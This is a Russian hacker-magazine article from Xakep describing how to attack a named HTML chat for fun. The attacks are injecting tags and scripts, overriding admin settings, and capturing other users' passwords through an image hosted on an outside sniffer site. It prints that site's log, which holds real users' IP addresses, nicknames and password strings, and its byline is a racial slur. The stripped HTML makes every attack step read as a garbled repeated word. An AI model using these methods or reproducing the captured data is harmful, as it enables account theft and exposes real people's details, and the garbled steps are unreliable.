Дырки в безопасности чатов

Xakep Online -> Журнал, номер #009, стр. 009-025-1

by nigger

Ты, конечно же, в курсе, что многие чаты на www далеки от совершенства. Нет, ну конечно, у них там есть всякие фенечки, всякие картиночки, рисуночки и прочая фигня, но вот защита там частенько просто отсутствует. Таких чатов полно, поэтому мы решили взять первый попавшийся из них и описать способы взлома. Системным администраторам этого чата Х советует еще раз проверить, что они там наконфигурили, и заткнуть все описываемые ниже дырки. Чат находится по адресу www.chat.orc.ru.

Будь готов - всегда готов

Когда нефига делать, то можно залезть и поприкалываться в html-чатах. Там, как правило, сидят ламеры и уроды, а также люди, которые только зашли в Инет. Прикалываться можно по разному: вставляя нецензурную брань, неприличные картинки, java-скрипты и прочие пакости. Чат "Початок" представляет стандартный, но немного переделанный свободно распространяемый чат "Chat Machine". В нем, якобы, запрещено вставлять html-теги, но мы это исправим. Размер и цвет шрифтов, которые определил админ, мы тоже исправим, как и скрытие IP других юзеров.

Как менять установки шрифта

Сохраняем то окно, где находятся установки (цвет, размер), открываем текстовым редактором и ищем следующую строчку Красный. Вместо слова Red можно подставить любое название цвета, ведь по умолчанию можно выбирать только цвета, установленные админом. :)

Находим поле Большой. Разве "+2" это большой шрифт? :) Нет, так дело не пойдет, пишем "+5".

Как вставлять теги

Находим стоку Красный. Берем и изменяем его следующим образом: Красный. Не закрываем тэг (потому что он и так закроется) и после название цвета закрываем тэг. Пишем любое сообщение, и тем самым получается, что чатлане видят не совсем пристойную картинку. :)

Таким образом можно ставить любой тэг типа Красный, и чат начинает "летать" :).

Как войти в чат под другим зарегистрированным пользователем и узнать их IP адреса

Находим строчку Красный и, используя всем известный синффер html чатов, получаем IP участников чата и их пароли. Делается это следующим образом: Красный. Далее пишем какое-либо сообщение, видим картинку HackZone и смотрим лог по адресу http://www.hackzone.ru/files/snifflog.txt. В нем мы видим следующее:

[Tue 3:03pm] (id) 195.210.130.46 d046.p1.col.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=YURIK&passwd=31ZUlukFqoI5c&custom1=on]

[Tue 3:03pm] (id) 212.15.128.4 dobbin.eurocom.od.ua 212.15.128.42 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=afrodita&passwd=480/SYC8r5W3U&custom1=on]

[Tue 3:03pm] (id) 129.132.26.41 ilea1.ethz.ch [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Monach&passwd=49aiRPRMobjZ6&custom1=on]

[Tue 3:03pm] (id) 195.2.78.163 p163.n78.dip.aha.ru [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=Patron25&passwd=13ttx6i7zWwkk&custom1=on]

[Tue 3:03pm] (id) 199.203.4.5 customer.netvision.net.il 207.232.23.220,194.90.119.123 [http://www.chat.orc.ru/cgi-bin/pochatok/chat.pl?nick=_RENAT__&passwd=315ybDkg5YM22&custom1=on]

Содержание  Вперед на стр. 009-025-2

ttfb: 3.2460689544678 ms